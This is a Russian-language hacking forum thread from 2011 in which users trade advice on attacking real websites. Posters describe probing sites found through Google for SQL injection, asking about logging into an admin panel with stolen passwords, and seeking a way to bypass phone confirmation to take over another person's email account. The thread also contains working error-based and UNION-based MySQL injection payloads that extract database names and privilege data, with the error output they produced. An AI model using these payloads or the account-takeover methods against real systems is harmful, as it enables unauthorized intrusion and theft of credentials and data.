 |
|
14.05.2011, 18:03
|
|
Новичок
Регистрация: 24.12.2010
Сообщений: 23
С нами:
8096726
Репутация:
0
|
|
Здравствуйте, короче я сегодня лазил в гугле и искал уязвимости. Забрел на один сайт добавил в конце кавычку, чтобы проверить его на скл инекшн. И мне выпадает типа мой ип и написано: твои действия были записаны в такой то департамент чего то там соединенных штатов. Внимание знатоки вопрос: это типа прикол, или мне реал копов с пушкой ждать xD
|
|
|
14.05.2011, 18:23
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от Kn[1
Fe^^"]
Kn[1]Fe^^ said:
Здравствуйте, короче я сегодня лазил в гугле и искал уязвимости. Забрел на один сайт добавил в конце кавычку, чтобы проверить его на скл инекшн. И мне выпадает типа мой ип и написано: твои действия были записаны в такой то департамент чего то там соединенных штатов. Внимание знатоки вопрос: это типа прикол, или мне реал копов с пушкой ждать xD
Подставив кавычку ты закон не нарушал, так что врятли
|
|
|
|
14.05.2011, 18:34
|
|
Новичок
Регистрация: 24.12.2010
Сообщений: 23
С нами:
8096726
Репутация:
0
|
|
Ок. А если пароли из саита вытащил и зашел через админку?
|
|
|
|
29.05.2011, 16:12
|
|
Новичок
Регистрация: 22.03.2011
Сообщений: 0
С нами:
7970006
Репутация:
0
|
|
Нужно восстановить пасс и обойти проверку на 4game.ru
восставливаем пасс на ящик enegeor2@ya.ru, требует подтверждение на мобил. телефон или доп почту - возможно ли как-то обойти подтверждение? раньше можно было менять код запроса, т.к. не было проверки.. http://www.youtube.com/watch?v=oHb_FcDzAYY&feature=player_embedded
|
|
|
|
30.05.2011, 21:48
|
|
Участник форума
Регистрация: 27.05.2009
Сообщений: 115
С нами:
8925319
Репутация:
97
|
|
Ввожу при входе в админку галочку в логин и пароль, вылетает :
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/html/richardnedved/www/tridy/Admini.class.php on line 26
Где почитать про скули в полях логина и пароля а не в браузере ?
|
|
|
|
30.05.2011, 23:12
|
|
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
С нами:
8859263
Репутация:
334
|
|
Сообщение от seofilms
Ввожу при входе в админку галочку в логин и пароль, вылетает :
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/html/richardnedved/www/tridy/Admini.class.php on line 26
Где почитать про скули в полях логина и пароля а не в браузере ?
Скули как скули. live http headers, чтобы удобнее, и крути.
|
|
|
|
04.07.2011, 20:06
|
|
Новичок
Регистрация: 14.11.2009
Сообщений: 5
С нами:
8678819
Репутация:
0
|
|
Есть сайт с sql инъекцией, в авторизации. Поля login и password. На запись и чтение прав нету, вывести информацию не получается. Известно название базы данных, логин на вход в базу, таблица с пользователями, количество и названия колонок.
Что ещё можно сделать с этим всем?
|
|
|
|
04.07.2011, 23:57
|
|
Новичок
Регистрация: 14.11.2009
Сообщений: 5
С нами:
8678819
Репутация:
0
|
|
Использую конструкцию:
Сообщение от None
-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(
DATABASE()
, 1, 63), FLOOR(RAND(0)*2))) --
В ошибке на странице выдаёт название базы данных.
Пытаюсь применить эту конструкцию для другого запроса:
Сообщение от None
-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(
SELECT user_1 FROM users
, 1, 63), FLOOR(RAND(0)*2))) --
Выдаёт ошибку, но команду не выполняет:
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT user_1 FROM users, 1, 63), FLOOR(RAND(0)*2))) -- '' at line 1
В итоге возникает вопрос. Как заставить выполниться команду
Сообщение от None
SELECT user_1 FROM users
Название столбца и таблицы точно эти. |
|
|
|
11.07.2011, 13:51
|
|
Новичок
Регистрация: 08.03.2010
Сообщений: 0
С нами:
8515014
Репутация:
0
|
|
Подскажите пожалуйста, почему у меня при попытке узнать параметры file_priv
выдает только ошибки. К примеру такую:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/local/www/data-dist/n*co*sult*ng.**/publications.php on line 7
пробовал на разных сайтах, везде или ошибки, или пустая страница
делаю так:
сначала узнаю имя пользвателя
test.php?id=-1+union+select+1,user(),3--
допустим root
затем пытаюсь узнать праметры file_priv для этого пользователя
test.php?id=-1+union+select+1,file_priv,3+from+mysql.user+where +user='root'--
|
|
|
|
11.07.2011, 15:57
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Сообщение от Sloneny
Подскажите пожалуйста, почему у меня при попытке узнать параметры file_priv
выдает только ошибки. К примеру такую:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/local/www/data-dist/n*co*sult*ng.**/publications.php on line 7
пробовал на разных сайтах, везде или ошибки, или пустая страница
делаю так:
сначала узнаю имя пользвателя
test.php?id=-1+union+select+1,user(),3--
допустим root
затем пытаюсь узнать праметры file_priv для этого пользователя
test.php?id=-1+union+select+1,file_priv,3+from+mysql.user+where +user='root'--
нет доступа к базе mysql
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для Kn[1]Fe^^](/avatars/avatar149473.jpg?2676133){kind=avatar}
![Аватар для Kn[1]Fe^^](/avatars/avatar149473.jpg?2676162){kind=avatar}
Похожие темы
Линейный вид
